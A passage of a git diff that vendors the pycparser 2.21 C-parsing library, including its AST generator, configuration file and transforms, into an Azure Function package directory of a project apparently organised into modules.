+pycparser/ply/cpp.py,sha256=UtC3ylTWp5_1MKA-PLCuwKQR8zSOnlGuGGIdzj8xS98,33282 +pycparser/ply/ctokens.py,sha256=MKksnN40TehPhgVfxCJhjj_BjL943apreABKYz-bl0Y,3177 +pycparser/ply/lex.py,sha256=7Qol57x702HZwjA3ZLp-84CUEWq1EehW-N67Wzghi-M,42918 +pycparser/ply/yacc.py,sha256=eatSDkRLgRr6X3-hoDk_SQQv065R0BdL2K7fQ54CgVM,137323 +pycparser/ply/ygen.py,sha256=2JYNeYtrPz1JzLSLO3d4GsS8zJU8jY_I_CR1VI9gWrA,2251 +pycparser/plyparser.py,sha256=8tLOoEytcapvWrr1JfCf7Dog-wulBtS1YrDs8S7JfMo,4875 +pycparser/yacctab.py,sha256=j_fVNIyDWDRVk7eWMqQtlBw2AwUSV5JTrtT58l7zis0,205652 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL new file mode 100644 index 0000000..4291317 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.34.2) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt new file mode 100644 index 0000000..1aa9c3d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt @@ -0,0 +1 @@ +pycparser diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py new file mode 100644 index 0000000..e6367c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py @@ -0,0 +1,90 @@ +#----------------------------------------------------------------- +# pycparser: __init__.py +# +# This package file exports some convenience functions for +# interacting with pycparser +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- +__all__ = ['c_lexer', 'c_parser', 'c_ast'] +__version__ = '2.21' + +import io +from subprocess import check_output +from .c_parser import CParser + + +def preprocess_file(filename, cpp_path='cpp', cpp_args=''): + """ Preprocess a file using cpp. + + filename: + Name of the file you want to preprocess. + + cpp_path: + cpp_args: + Refer to the documentation of parse_file for the meaning of these + arguments. + + When successful, returns the preprocessed file's contents. + Errors from cpp will be printed out. + """ + path_list = [cpp_path] + if isinstance(cpp_args, list): + path_list += cpp_args + elif cpp_args != '': + path_list += [cpp_args] + path_list += [filename] + + try: + # Note the use of universal_newlines to treat all newlines + # as \n for Python's purpose + text = check_output(path_list, universal_newlines=True) + except OSError as e: + raise RuntimeError("Unable to invoke 'cpp'. " + + 'Make sure its path was passed correctly\n' + + ('Original error: %s' % e)) + + return text + + +def parse_file(filename, use_cpp=False, cpp_path='cpp', cpp_args='', + parser=None): + """ Parse a C file using pycparser. + + filename: + Name of the file you want to parse. + + use_cpp: + Set to True if you want to execute the C pre-processor + on the file prior to parsing it. + + cpp_path: + If use_cpp is True, this is the path to 'cpp' on your + system. If no path is provided, it attempts to just + execute 'cpp', so it must be in your PATH. + + cpp_args: + If use_cpp is True, set this to the command line arguments strings + to cpp. Be careful with quotes - it's best to pass a raw string + (r'') here. For example: + r'-I../utils/fake_libc_include' + If several arguments are required, pass a list of strings. + + parser: + Optional parser object to be used instead of the default CParser + + When successful, an AST is returned. ParseError can be + thrown if the file doesn't parse successfully. + + Errors from cpp will be printed out. + """ + if use_cpp: + text = preprocess_file(filename, cpp_path, cpp_args) + else: + with io.open(filename) as f: + text = f.read() + + if parser is None: + parser = CParser() + return parser.parse(text, filename) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..8f15b61 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc new file mode 100644 index 0000000..599c96e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc new file mode 100644 index 0000000..a8a81de Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc new file mode 100644 index 0000000..dfcff6c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc new file mode 100644 index 0000000..2144cf3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc new file mode 100644 index 0000000..9a715cb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc new file mode 100644 index 0000000..5b732d3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc new file mode 100644 index 0000000..156d3ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc new file mode 100644 index 0000000..36aaf37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc new file mode 100644 index 0000000..9d3bc75 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc new file mode 100644 index 0000000..d6f7e6e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py new file mode 100644 index 0000000..b028098 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py @@ -0,0 +1,336 @@ +#----------------------------------------------------------------- +# _ast_gen.py +# +# Generates the AST Node classes from a specification given in +# a configuration file +# +# The design of this module was inspired by astgen.py from the +# Python 2.5 code-base. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- +from string import Template + + +class ASTCodeGenerator(object): + def __init__(self, cfg_filename='_c_ast.cfg'): + """ Initialize the code generator from a configuration + file. + """ + self.cfg_filename = cfg_filename + self.node_cfg = [NodeCfg(name, contents) + for (name, contents) in self.parse_cfgfile(cfg_filename)] + + def generate(self, file=None): + """ Generates the code into file, an open file buffer. + """ + src = Template(_PROLOGUE_COMMENT).substitute( + cfg_filename=self.cfg_filename) + + src += _PROLOGUE_CODE + for node_cfg in self.node_cfg: + src += node_cfg.generate_source() + '\n\n' + + file.write(src) + + def parse_cfgfile(self, filename): + """ Parse the configuration file and yield pairs of + (name, contents) for each node. + """ + with open(filename, "r") as f: + for line in f: + line = line.strip() + if not line or line.startswith('#'): + continue + colon_i = line.find(':') + lbracket_i = line.find('[') + rbracket_i = line.find(']') + if colon_i < 1 or lbracket_i <= colon_i or rbracket_i <= lbracket_i: + raise RuntimeError("Invalid line in %s:\n%s\n" % (filename, line)) + + name = line[:colon_i] + val = line[lbracket_i + 1:rbracket_i] + vallist = [v.strip() for v in val.split(',')] if val else [] + yield name, vallist + + +class NodeCfg(object): + """ Node configuration. + + name: node name + contents: a list of contents - attributes and child nodes + See comment at the top of the configuration file for details. + """ + + def __init__(self, name, contents): + self.name = name + self.all_entries = [] + self.attr = [] + self.child = [] + self.seq_child = [] + + for entry in contents: + clean_entry = entry.rstrip('*') + self.all_entries.append(clean_entry) + + if entry.endswith('**'): + self.seq_child.append(clean_entry) + elif entry.endswith('*'): + self.child.append(clean_entry) + else: + self.attr.append(entry) + + def generate_source(self): + src = self._gen_init() + src += '\n' + self._gen_children() + src += '\n' + self._gen_iter() + src += '\n' + self._gen_attr_names() + return src + + def _gen_init(self): + src = "class %s(Node):\n" % self.name + + if self.all_entries: + args = ', '.join(self.all_entries) + slots = ', '.join("'{0}'".format(e) for e in self.all_entries) + slots += ", 'coord', '__weakref__'" + arglist = '(self, %s, coord=None)' % args + else: + slots = "'coord', '__weakref__'" + arglist = '(self, coord=None)' + + src += " __slots__ = (%s)\n" % slots + src += " def __init__%s:\n" % arglist + + for name in self.all_entries + ['coord']: + src += " self.%s = %s\n" % (name, name) + + return src + + def _gen_children(self): + src = ' def children(self):\n' + + if self.all_entries: + src += ' nodelist = []\n' + + for child in self.child: + src += ( + ' if self.%(child)s is not None:' + + ' nodelist.append(("%(child)s", self.%(child)s))\n') % ( + dict(child=child)) + + for seq_child in self.seq_child: + src += ( + ' for i, child in enumerate(self.%(child)s or []):\n' + ' nodelist.append(("%(child)s[%%d]" %% i, child))\n') % ( + dict(child=seq_child)) + + src += ' return tuple(nodelist)\n' + else: + src += ' return ()\n' + + return src + + def _gen_iter(self): + src = ' def __iter__(self):\n' + + if self.all_entries: + for child in self.child: + src += ( + ' if self.%(child)s is not None:\n' + + ' yield self.%(child)s\n') % (dict(child=child)) + + for seq_child in self.seq_child: + src += ( + ' for child in (self.%(child)s or []):\n' + ' yield child\n') % (dict(child=seq_child)) + + if not (self.child or self.seq_child): + # Empty generator + src += ( + ' return\n' + + ' yield\n') + else: + # Empty generator + src += ( + ' return\n' + + ' yield\n') + + return src + + def _gen_attr_names(self): + src = " attr_names = (" + ''.join("%r, " % nm for nm in self.attr) + ')' + return src + + +_PROLOGUE_COMMENT = \ +r'''#----------------------------------------------------------------- +# ** ATTENTION ** +# This code was automatically generated from the file: +# $cfg_filename +# +# Do not modify it directly. Modify the configuration file and +# run the generator again. +# ** ** *** ** ** +# +# pycparser: c_ast.py +# +# AST Node classes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +''' + +_PROLOGUE_CODE = r''' +import sys + +def _repr(obj): + """ + Get the representation of an object, with dedicated pprint-like format for lists. + """ + if isinstance(obj, list): + return '[' + (',\n '.join((_repr(e).replace('\n', '\n ') for e in obj))) + '\n]' + else: + return repr(obj) + +class Node(object): + __slots__ = () + """ Abstract base class for AST nodes. + """ + def __repr__(self): + """ Generates a python representation of the current node + """ + result = self.__class__.__name__ + '(' + + indent = '' + separator = '' + for name in self.__slots__[:-2]: + result += separator + result += indent + result += name + '=' + (_repr(getattr(self, name)).replace('\n', '\n ' + (' ' * (len(name) + len(self.__class__.__name__))))) + + separator = ',' + indent = '\n ' + (' ' * len(self.__class__.__name__)) + + result += indent + ')' + + return result + + def children(self): + """ A sequence of all children that are Nodes + """ + pass + + def show(self, buf=sys.stdout, offset=0, attrnames=False, nodenames=False, showcoord=False, _my_node_name=None): + """ Pretty print the Node and all its attributes and + children (recursively) to a buffer. + + buf: + Open IO buffer into which the Node is printed. + + offset: + Initial offset (amount of leading spaces) + + attrnames: + True if you want to see the attribute names in + name=value pairs. False to only see the values. + + nodenames: + True if you want to see the actual node names + within their parents. + + showcoord: + Do you want the coordinates of each Node to be + displayed. + """ + lead = ' ' * offset + if nodenames and _my_node_name is not None: + buf.write(lead + self.__class__.__name__+ ' <' + _my_node_name + '>: ') + else: + buf.write(lead + self.__class__.__name__+ ': ') + + if self.attr_names: + if attrnames: + nvlist = [(n, getattr(self,n)) for n in self.attr_names] + attrstr = ', '.join('%s=%s' % nv for nv in nvlist) + else: + vlist = [getattr(self, n) for n in self.attr_names] + attrstr = ', '.join('%s' % v for v in vlist) + buf.write(attrstr) + + if showcoord: + buf.write(' (at %s)' % self.coord) + buf.write('\n') + + for (child_name, child) in self.children(): + child.show( + buf, + offset=offset + 2, + attrnames=attrnames, + nodenames=nodenames, + showcoord=showcoord, + _my_node_name=child_name) + + +class NodeVisitor(object): + """ A base NodeVisitor class for visiting c_ast nodes. + Subclass it and define your own visit_XXX methods, where + XXX is the class name you want to visit with these + methods. + + For example: + + class ConstantVisitor(NodeVisitor): + def __init__(self): + self.values = [] + + def visit_Constant(self, node): + self.values.append(node.value) + + Creates a list of values of all the constant nodes + encountered below the given node. To use it: + + cv = ConstantVisitor() + cv.visit(node) + + Notes: + + * generic_visit() will be called for AST nodes for which + no visit_XXX method was defined. + * The children of nodes for which a visit_XXX was + defined will not be visited - if you need this, call + generic_visit() on the node. + You can use: + NodeVisitor.generic_visit(self, node) + * Modeled after Python's own AST visiting facilities + (the ast module of Python 3.0) + """ + + _method_cache = None + + def visit(self, node): + """ Visit a node. + """ + + if self._method_cache is None: + self._method_cache = {} + + visitor = self._method_cache.get(node.__class__.__name__, None) + if visitor is None: + method = 'visit_' + node.__class__.__name__ + visitor = getattr(self, method, self.generic_visit) + self._method_cache[node.__class__.__name__] = visitor + + return visitor(node) + + def generic_visit(self, node): + """ Called if no explicit visitor function exists for a + node. Implements preorder visiting of the node. + """ + for c in node: + self.visit(c) + +''' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py new file mode 100644 index 0000000..7f46a99 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_build_tables.py @@ -0,0 +1,37 @@ +#----------------------------------------------------------------- +# pycparser: _build_tables.py +# +# A dummy for generating the lexing/parsing tables and and +# compiling them into .pyc for faster execution in optimized mode. +# Also generates AST code from the configuration file. +# Should be called from the pycparser directory. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +# Insert '.' and '..' as first entries to the search path for modules. +# Restricted environments like embeddable python do not include the +# current working directory on startup. +import sys +sys.path[0:0] = ['.', '..'] + +# Generate c_ast.py +from _ast_gen import ASTCodeGenerator +ast_gen = ASTCodeGenerator('_c_ast.cfg') +ast_gen.generate(open('c_ast.py', 'w')) + +from pycparser import c_parser + +# Generates the tables +# +c_parser.CParser( + lex_optimize=True, + yacc_debug=False, + yacc_optimize=True) + +# Load to compile into .pyc +# +import lextab +import yacctab +import c_ast diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg new file mode 100644 index 0000000..bbcf06b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_c_ast.cfg @@ -0,0 +1,195 @@ +#----------------------------------------------------------------- +# pycparser: _c_ast.cfg +# +# Defines the AST Node classes used in pycparser. +# +# Each entry is a Node sub-class name, listing the attributes +# and child nodes of the class: +# * - a child node +# ** - a sequence of child nodes +# - an attribute +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +# ArrayDecl is a nested declaration of an array with the given type. +# dim: the dimension (for example, constant 42) +# dim_quals: list of dimension qualifiers, to support C99's allowing 'const' +# and 'static' within the array dimension in function declarations. +ArrayDecl: [type*, dim*, dim_quals] + +ArrayRef: [name*, subscript*] + +# op: =, +=, /= etc. +# +Assignment: [op, lvalue*, rvalue*] + +Alignas: [alignment*] + +BinaryOp: [op, left*, right*] + +Break: [] + +Case: [expr*, stmts**] + +Cast: [to_type*, expr*] + +# Compound statement in C99 is a list of block items (declarations or +# statements). +# +Compound: [block_items**] + +# Compound literal (anonymous aggregate) for C99. +# (type-name) {initializer_list} +# type: the typename +# init: InitList for the initializer list +# +CompoundLiteral: [type*, init*] + +# type: int, char, float, string, etc. +# +Constant: [type, value] + +Continue: [] + +# name: the variable being declared +# quals: list of qualifiers (const, volatile) +# funcspec: list function specifiers (i.e. inline in C99) +# storage: list of storage specifiers (extern, register, etc.) +# type: declaration type (probably nested with all the modifiers) +# init: initialization value, or None +# bitsize: bit field size, or None +# +Decl: [name, quals, align, storage, funcspec, type*, init*, bitsize*] + +DeclList: [decls**] + +Default: [stmts**] + +DoWhile: [cond*, stmt*] + +# Represents the ellipsis (...) parameter in a function +# declaration +# +EllipsisParam: [] + +# An empty statement (a semicolon ';' on its own) +# +EmptyStatement: [] + +# Enumeration type specifier +# name: an optional ID +# values: an EnumeratorList +# +Enum: [name, values*] + +# A name/value pair for enumeration values +# +Enumerator: [name, value*] + +# A list of enumerators +# +EnumeratorList: [enumerators**] + +# A list of expressions separated by the comma operator. +# +ExprList: [exprs**] + +# This is the top of the AST, representing a single C file (a +# translation unit in K&R jargon). It contains a list of +# "external-declaration"s, which is either declarations (Decl), +# Typedef or function definitions (FuncDef). +# +FileAST: [ext**] + +# for (init; cond; next) stmt +# +For: [init*, cond*, next*, stmt*] + +# name: Id +# args: ExprList +# +FuncCall: [name*, args*] + +# type (args) +# +FuncDecl: [args*, type*] + +# Function definition: a declarator for the function name and +# a body, which is a compound statement. +# There's an optional list of parameter declarations for old +# K&R-style definitions +# +FuncDef: [decl*, param_decls**, body*] + +Goto: [name] + +ID: [name] + +# Holder for types that are a simple identifier (e.g. the built +# ins void, char etc. and typedef-defined types) +# +IdentifierType: [names] + +If: [cond*, iftrue*, iffalse*] + +# An initialization list used for compound literals. +# +InitList: [exprs**] + +Label: [name, stmt*] + +# A named initializer for C99. +# The name of a NamedInitializer is a sequence of Nodes, because +# names can be hierarchical and contain constant expressions. +# +NamedInitializer: [name**, expr*] + +# a list of comma separated function parameter declarations +# +ParamList: [params**] + +PtrDecl: [quals, type*] + +Return: [expr*] + +StaticAssert: [cond*, message*] + +# name: struct tag name +# decls: declaration of members +# +Struct: [name, decls**] + +# type: . or -> +# name.field or name->field +# +StructRef: [name*, type, field*] + +Switch: [cond*, stmt*] + +# cond ? iftrue : iffalse +# +TernaryOp: [cond*, iftrue*, iffalse*] + +# A base type declaration +# +TypeDecl: [declname, quals, align, type*] + +# A typedef declaration. +# Very similar to Decl, but without some attributes +# +Typedef: [name, quals, storage, type*] + +Typename: [name, quals, align, type*] + +UnaryOp: [op, expr*] + +# name: union tag name +# decls: declaration of members +# +Union: [name, decls**] + +While: [cond*, stmt*] + +Pragma: [string] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py new file mode 100644 index 0000000..68915d4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ast_transforms.py @@ -0,0 +1,164 @@ +#------------------------------------------------------------------------------ +# pycparser: ast_transforms.py +# +# Some utilities used by the parser to create a friendlier AST. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#------------------------------------------------------------------------------ + +from . import c_ast + + +def fix_switch_cases(switch_node): + """ The 'case' statements in a 'switch' come out of parsing with one + child node, so subsequent statements are just tucked to the parent + Compound. Additionally, consecutive (fall-through) case statements + come out messy. This is a peculiarity of the C grammar. The following: + + switch (myvar) { + case 10: + k = 10; + p = k + 1; + return 10; + case 20: + case 30: + return 20; + default: + break; + } + + Creates this tree (pseudo-dump): + + Switch + ID: myvar + Compound: + Case 10: + k = 10 + p = k + 1 + return 10 + Case 20: + Case 30: + return 20 + Default: + break + + The goal of this transform is to fix this mess, turning it into the + following: + + Switch + ID: myvar + Compound: + Case 10: + k = 10 + p = k + 1 + return 10 + Case 20: + Case 30: + return 20 + Default: + break + + A fixed AST node is returned. The argument may be modified. + """ + assert isinstance(switch_node, c_ast.Switch) + if not isinstance(switch_node.stmt, c_ast.Compound): + return switch_node + + # The new Compound child for the Switch, which will collect children in the + # correct order + new_compound = c_ast.Compound([], switch_node.stmt.coord) + + # The last Case/Default node + last_case = None + + # Goes over the children of the Compound below the Switch, adding them + # either directly below new_compound or below the last Case as appropriate + # (for `switch(cond) {}`, block_items would have been None) + for child in (switch_node.stmt.block_items or []): + if isinstance(child, (c_ast.Case, c_ast.Default)): + # If it's a Case/Default: + # 1. Add it to the Compound and mark as "last case" + # 2. If its immediate child is also a Case or Default, promote it + # to a sibling. + new_compound.block_items.append(child) + _extract_nested_case(child, new_compound.block_items) + last_case = new_compound.block_items[-1] + else: + # Other statements are added as children to the last case, if it + # exists. + if last_case is None: + new_compound.block_items.append(child) + else: + last_case.stmts.append(child) + + switch_node.stmt = new_compound + return switch_node + + +def _extract_nested_case(case_node, stmts_list): + """ Recursively extract consecutive Case statements that are made nested + by the parser and add them to the stmts_list. + """ + if isinstance(case_node.stmts[0], (c_ast.Case, c_ast.Default)): + stmts_list.append(case_node.stmts.pop()) + _extract_nested_case(stmts_list[-1], stmts_list) + + +def fix_atomic_specifiers(decl): + """ Atomic specifiers like _Atomic(type) are unusually structured, + conferring a qualifier upon the contained type. + + This function fixes a decl with atomic specifiers to have a sane AST + structure, by removing spurious Typename->TypeDecl pairs and attaching + the _Atomic qualifier in the right place. + """ + # There can be multiple levels of _Atomic in a decl; fix them until a + # fixed point is reached. + while True: + decl, found = _fix_atomic_specifiers_once(decl) + if not found: + break + + # Make sure to add an _Atomic qual on the topmost decl if needed. Also + # restore the declname on the innermost TypeDecl (it gets placed in the + # wrong place during construction). + typ = decl + while not isinstance(typ, c_ast.TypeDecl): + try: + typ = typ.type + except AttributeError: + return decl + if '_Atomic' in typ.quals and '_Atomic' not in decl.quals: + decl.quals.append('_Atomic') + if typ.declname is None: + typ.declname = decl.name + + return decl + + +def _fix_atomic_specifiers_once(decl): + """ Performs one 'fix' round of atomic specifiers. + Returns (modified_decl, found) where found is True iff a fix was made. + """ + parent = decl + grandparent = None + node = decl.type + while node is not None: + if isinstance(node, c_ast.Typename) and '_Atomic' in node.quals: + break + try: + grandparent = parent + parent = node + node = node.type + except AttributeError: + # If we've reached a node without a `type` field, it means we won't + # find what we're looking for at this point; give up the search + # and return the original decl unmodified. + return decl, False + + assert isinstance(parent, c_ast.TypeDecl) + grandparent.type = node.type + if '_Atomic' not in node.type.quals: + node.type.quals.append('_Atomic') + return decl, True diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py new file mode 100644 index 0000000..7fe103c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/c_ast.py @@ -0,0 +1,1125 @@ +#----------------------------------------------------------------- +# ** ATTENTION ** +# This code was automatically generated from the file: +# _c_ast.cfg +# +# Do not modify it directly. Modify the configuration file and +# run the generator again. +# ** ** *** ** ** +# +# pycparser: c_ast.py +# +# AST Node classes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + + +import sys + +def _repr(obj): + """ + Get the representation of an object, with dedicated pprint-like format for lists. + """ + if isinstance(obj, list): + return '[' + (',\n '.join((_repr(e).replace('\n', '\n ') for e in obj))) + '\n]' + else: + return repr(obj) + +class Node(object): + __slots__ = () + """ Abstract base class for AST nodes. + """ + def __repr__(self): + """ Generates a python representation of the current node + """ + result = self.__class__.__name__ + '(' + + indent = '' + separator = '' + for name in self.__slots__[:-2]: + result += separator + result += indent + result += name + '=' + (_repr(getattr(self, name)).replace('\n', '\n ' + (' ' * (len(name) + len(self.__class__.__name__))))) + + separator = ',' + indent = '\n ' + (' ' * len(self.__class__.__name__)) + + result += indent + ')' + + return result + + def children(self): + """ A sequence of all children that are Nodes + """ + pass + + def show(self, buf=sys.stdout, offset=0, attrnames=False, nodenames=False, showcoord=False, _my_node_name=None): + """ Pretty print the Node and all its attributes and + children (recursively) to a buffer. + + buf: + Open IO buffer into which the Node is printed. + + offset: + Initial offset (amount of leading spaces) + + attrnames: + True if you want to see the attribute names in + name=value pairs. False to only see the values. + + nodenames: + True if you want to see the actual node names + within their parents. + + showcoord: + Do you want the coordinates of each Node to be + displayed. + """ + lead = ' ' * offset + if nodenames and _my_node_name is not None: + buf.write(lead + self.__class__.__name__+ ' <' + _my_node_name + '>: ') + else: + buf.write(lead + self.__class__.__name__+ ': ') + + if self.attr_names: + if attrnames: + nvlist = [(n, getattr(self,n)) for n in self.attr_names] + attrstr = ', '.join('%s=%s' % nv for nv in nvlist) + else: + vlist = [getattr(self, n) for n in self.attr_names] + attrstr = ', '.join('%s' % v for v in vlist) + buf.write(attrstr) + + if showcoord: + buf.write(' (at %s)' % self.coord) + buf.write('\n') + + for (child_name, child) in self.children(): + child.show( + buf, + offset=offset + 2, + attrnames=attrnames, + nodenames=nodenames, + showcoord=showcoord, + _my_node_name=child_name) + + +class NodeVisitor(object): + """ A base NodeVisitor class for visiting c_ast nodes. + Subclass it and define your own visit_XXX methods, where + XXX is the class name you want to visit with these + methods. + + For example: + + class ConstantVisitor(NodeVisitor): + def __init__(self): + self.values = [] + + def visit_Constant(self, node): + self.values.append(node.value) + + Creates a list of values of all the constant nodes + encountered below the given node. To use it: + + cv = ConstantVisitor() + cv.visit(node) + + Notes: + + * generic_visit() will be called for AST nodes for which + no visit_XXX method was defined. + * The children of nodes for which a visit_XXX was + defined will not be visited - if you need this, call + generic_visit() on the node. + You can use: + NodeVisitor.generic_visit(self, node) + * Modeled after Python's own AST visiting facilities + (the ast module of Python 3.0) + """ + + _method_cache = None + + def visit(self, node): + """ Visit a node. + """ + + if self._method_cache is None: + self._method_cache = {} + + visitor = self._method_cache.get(node.__class__.__name__, None) + if visitor is None: + method = 'visit_' + node.__class__.__name__ + visitor = getattr(self, method, self.generic_visit) + self._method_cache[node.__class__.__name__] = visitor + + return visitor(node) + + def generic_visit(self, node): + """ Called if no explicit visitor function exists for a + node. Implements preorder visiting of the node. + """ + for c in node: + self.visit(c) + +class ArrayDecl(Node): + __slots__ = ('type', 'dim', 'dim_quals', 'coord', '__weakref__') + def __init__(self, type, dim, dim_quals, coord=None): + self.type = type + self.dim = dim + self.dim_quals = dim_quals + self.coord = coord + + def children(self): + nodelist = [] + if self.type is not None: nodelist.append(("type", self.type)) + if self.dim is not None: nodelist.append(("dim", self.dim)) + return tuple(nodelist) + + def __iter__(self): + if self.type is not None: + yield self.type + if self.dim is not None: + yield self.dim + + attr_names = ('dim_quals', ) + +class ArrayRef(Node): + __slots__ = ('name', 'subscript', 'coord', '__weakref__') + def __init__(self, name, subscript, coord=None): + self.name = name + self.subscript = subscript + self.coord = coord + + def children(self): + nodelist = [] + if self.name is not None: nodelist.append(("name", self.name)) + if self.subscript is not None: nodelist.append(("subscript", self.subscript)) + return tuple(nodelist) + + def __iter__(self): + if self.name is not None: + yield self.name + if self.subscript is not None: + yield self.subscript + + attr_names = () + +class Assignment(Node): + __slots__ = ('op', 'lvalue', 'rvalue', 'coord', '__weakref__') + def __init__(self, op, lvalue, rvalue, coord=None): + self.op = op + self.lvalue = lvalue + self.rvalue = rvalue + self.coord = coord + + def children(self): + nodelist = [] + if self.lvalue is not None: 